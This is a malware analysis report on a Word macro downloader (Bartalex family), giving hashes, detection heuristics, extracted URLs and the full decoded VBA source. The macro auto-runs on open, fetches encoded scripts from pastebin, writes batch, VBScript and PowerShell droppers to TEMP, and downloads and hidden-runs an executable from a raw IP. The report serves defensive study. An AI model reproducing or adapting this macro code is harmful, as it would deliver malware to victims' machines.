Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 ce42f76b779f821e…

MALICIOUS

Office (OLE)

55.5 KB Created: 2015-02-17 05:36:00 Authoring application: Microsoft Office Word First seen: 2015-04-15
MD5: de82daf570f05f4ec94a3d1f9f31e174 SHA-1: f2f6394370c6d2fb8d82463a1200b5fbb76c9b7b SHA-256: ce42f76b779f821e796a9d26c1178043d38320894dc8f5c1ff4021a5c8932152
354 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1105 Ingress Tool Transfer T1566.001 Spearphishing Attachment

The sample contains VBA macros with Auto_Open and other auto-execution markers, indicating it's designed to run code upon opening. The script attempts to download content from 'http://pastebin.com/raw.php?i=aktK9NDE' using MSXML2.ServerXMLHTTP, decodes it, and then extracts further URLs and data. This strongly suggests a downloader functionality, likely to fetch and execute a second-stage payload. The presence of CreateObject and Shell calls further supports this malicious intent.

Heuristics 13

  • ClamAV: Doc.Downloader.Bartalex-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Bartalex-1
  • VBA macros detected medium 9 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
    Shell(b, 0)
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
        Set obg = CreateObject("MSXML2.ServerXMLHTTP")
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
    Matched line in script
    Quick = GetObject(a)
  • Payload URL assembled from a Chr()/Asc() string expression (3 URLs) high OLE_VBA_EXPR_DROPPER_URL
    A VBA macro builds its stage-2 download URL character by character from string literals concatenated with Chr()/Asc()/StrReverse() results — often nested (Chr(Asc(Chr(Asc("h")))) = "h") and split across the + and & operators, sometimes written out via Print #n, into a second-stage VBScript/PowerShell file. The URL is assembled at run time and never appears contiguously on disk, and there is no numeric array to brute-force, so a literal scan and the array recoverers both miss it. A bounded expression evaluator resolved it; surfaced as an IOC. Self-validating: only a valid host URL that is not already present verbatim in the macro is reported, so a benign macro cannot false-positive.
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub AutoOpen()
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    Sub Workbook_Open()
  • Auto_Open macro low OLE_VBA_AUTO
    Auto_Open macro
    Matched line in script
    Sub Auto_Open()
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
    Environ(a)
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://savepic.su/5564915.png Referenced by macro
    • http://savepic.su/5565939.pngReferenced by macro
    • http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)
    • http://pastebin.com/raw.php?i=123123123Referenced by macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 6229 bytes
SHA-256: 1abc0d3e4fd8ce6df0ac0c4f5ad5f79094ba5c9f76ceee0a9a6f5105f4bac87a
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub Auto_Open()
    hufewf
End Sub
Sub hufewf()
   
    Dim retVal As Variant
    FL2 = CStr(Int((100000 * Rnd) + 10000))
    PH2 = Module1.Bad("TEMP") + "\"
    
    JUDQW = "bajwqhduqwkhdbaqwet"
    WKDOQ = "461237618273612"
    PSFL = FL2 + "." + "p" + "s" + "1"
    VBFL = FL2 + ".v" + "b" + "s"
    BAFL = FL2 + Chr(45 + Sgn(Val(FL2))) + Left(JUDQW, 2) + Right(JUDQW, 1)
    KDOW = "pasteb"
    'MsgBox (BAFL)
    INTG = "object"
    AFTG = "module"

    SXE = ".exe"
    GNG = ".png"
    
    PHT = "http://"
    PBIN = PHT + KDOW + "in.com/raw.php?i="
    SPIC = PHT + "sav" & "epic.su/"
     
    PSPTH = PH2 + PSFL
    VBPTH = PH2 + VBFL
    BAPTH = PH2 + BAFL
    
    AFT = FreeFile
    BFT = FreeFile
    CFT = FreeFile
    DFT = FreeFile
    EFT = FreeFile
    
    Dim obg As Object
    Dim asdwq As String
    Set obg = CreateObject("MSXML2.ServerXMLHTTP")
    obg.Open "GET", PBIN + "aktK9NDE"
    obg.Send ""
    CONT = obg.ResponseText
    asdwq = CONT
    CONT = Module1.Decode(asdwq)
    
    TVT10 = Module1.Tort(CONT, "text10")
    TVT20 = Module1.Tort(CONT, "text20")
    TVT21 = Module1.Tort(CONT, "text21")
    TVT30 = Module1.Tort(CONT, "text30")
    TVT31 = Module1.Tort(CONT, "text31")
    XPT1 = Module1.Tort(CONT, "stext1")
    XPT2 = Module1.Tort(CONT, "stext2")
    XPT3 = Module1.Tort(CONT, "stext3")
    
    WVR = Module1.Bad("USERPROFILE")
    post1 = InStr(WVR, "sers\")
    If (post1 <> 0) Then
        VRR = "1"
    Else
        VRR = "0"
    End If

    Module1.WaitFor (1)
    
    SEXX = PHT + "91.194.254.216/us/file" + SXE
    PSTB = PBIN + "123123123"
    STAR1 = SPIC + "5564915" + GNG
    STAR2 = SPIC + "5565939" + GNG
    FFQ = "updater8"
    FF = FFQ + SXE
 
  
If (VRR = "0") Then
     Open BAPTH For Output As #AFT
     Print #AFT, XPT1
     Print #AFT, "set trfd=" + Chr(34) + PH2 + Chr(34)
     Print #AFT, "set nmsj=" + Chr(34) + FL2 + Chr(34)
     Print #AFT, "set exds=" + Chr(34) + FFQ + Chr(34)
     Print #AFT, XPT2
     Close #AFT
     
     Module1.WaitFor (2)
     
     Open VBPTH For Output As #BFT
     Print #BFT, "strRT = " + Chr(34) + SEXX + Chr(34)
     Print #BFT, "statRT = " + Chr(34) + STAR1 + Chr(34)
     Print #BFT, "jfeuygq = " + Chr(34) + FF + Chr(34)
     Print #BFT, "strTecation = " + Chr(34) + PH2 + Chr(34) + "+jfeuygq"
     Print #BFT, XPT3
     Close #BFT
     
     Module1.WaitFor (2)
     NTH1 = Module1.Great(retVal, BAPTH)
     
End If



If (VRR = "1") Then
     Open PSPTH For Output As #CFT
     Print #CFT, "$stat = '" + STAR2 + "';"
     Print #CFT, "$ggtt  = '" + SEXX + "';"
     Print #CFT, "$pths = '" + PH2 + "';"
     Print #CFT, "$wehs = '" + FL2 + "';"
     Print #CFT, "$nnm = '" + FFQ + "';"
     Print #CFT, TVT10
     Close #CFT
     
     Open VBPTH For Output As #DFT
     Print #DFT, TVT30
     Print #DFT, "currentFile = " + Chr(34) + PH2 + Chr(34) + "&" + Chr(34) + FL2 + Chr(34) + "&djwq"
     Print #DFT, TVT31
     Close #DFT
    
     Open BAPTH For Output As #EFT
     Print #EFT, TVT20
     Print #EFT, "set Ads3=" + Chr(34) + FL2 + Chr(34)
     Print #EFT, "set Gds4=" + Chr(34) + PH2 + Chr(34) + "%Ads3%"
     Print #EFT, TVT21
     Close #EFT
     Module1.WaitFor (1)
    
     NTH2 = Module1.Great(retVal, BAPTH)
     
End If

    NTH3 = Module2.Tag("<" + INTG + ">", "</" + INTG + ">", 1)
    NTH4 = Module2.Tag("<" + AFTG + ">", "</" + AFTG + ">", 2)
    NTH5 = Module2.Tag("<" + INTG + ">", "", 3)
    NTH6 = Module2.Tag("</" + INTG + ">", "", 3)
    NTH7 = Module2.Tag("<" + AFTG + ">", "", 3)
    NTH8 = Module2.Tag("</" + AFTG + ">", "", 3)


End Sub


Sub AutoOpen()
    Auto_Open
End Sub
Sub Workbook_Open()
    Auto_Open
End Sub








Attribute VB_Name = "Module1"
Public Function Great(a As Variant, b)
a = _
Shell(b, 0)
Great = a
End Function

Public Function Tort(a, b As String)
Dim krd, lent As Integer
krd = InStr(1, a, "<" + b + ">") + 8
lent = InStr(1, a, "</" + b + ">") - krd
KLMN = Mid(a, krd, lent)
Tort = KLMN
End Function

Public Function Dtgt(a As String)
Quick = GetObject(a)
End Function

Public Function Quick(a As String)
Quick = GetObject(a)
End Function

Public Function Bad(a As String)
Bad = _
Environ(a)
End Function

Sub WaitFor(NumOfSeconds As Long)
Dim SngSec As Long
SngSec = Timer + NumOfSeconds
Do While Timer < SngSec
DoEvents
Loop
End Sub

Public Function Decode(ByVal strData As String) As String
    Dim objXML As Object
    Dim objNode As Object
    Set objXML = CreateObject("MSXML2.DOMDocument")
    Set objNode = objXML.createElement("b64")
    objNode.DataType = "bin.base64"
    objNode.Text = strData
    Decode = objNode.nodeTypedValue
    Set objNode = Nothing
    Set objXML = Nothing
End Function


Attribute VB_Name = "Module2"
Public Function Tag(a As String, b As String, c As Integer)
Dim selectedText As String
Dim hhhg, selRange As Range
Set hhhg = ActiveDocument.Range
With hhhg.Find
.Text = a
.MatchWholeWord = True
.Execute
hhhg.Collapse direction:=wdCollapseEnd
JIDSF = "kh 21jkh3 21jkh3g j12g3jk12g3 31"
JQWQWIDSF = "kh 21jkh3 21jkh3g j12g3jk12g3 31"
JQWEQWDIDSF = "kh 21jkh3 21jkh3g j12g3jk12g3 31"
Set selRange = ActiveDocument.Range
JIDSF = "kh 21jkh3 21jkh3g j12g3jk12g3 31"
JQWQWIDSF = "kh 21jkh3 21jkh3g j12g3jk12g3 31"
JQWEQWDIDSF = "kh 21jkh3 21jkh3g j12g3jk12g3 31"
selRange.Start = hhhg.End
.Text = b
.MatchWholeWord = True
.Execute
hhhg.Collapse direction:=wdCollapseStart
selRange.End = hhhg.Start
If (c = 1) Then
    selectedText = selRange.Delete
End If
If (c = 2) Then
    selRange.Font.Color = wdColorBlack
End If
If (c = 3) Then
    With hhhg.Find
    .Text = a
    .Replacement.Text = ""
    .Wrap = wdFindContinue
    .Execute Replace:=wdReplaceAll
    End With
End If

End With
End Function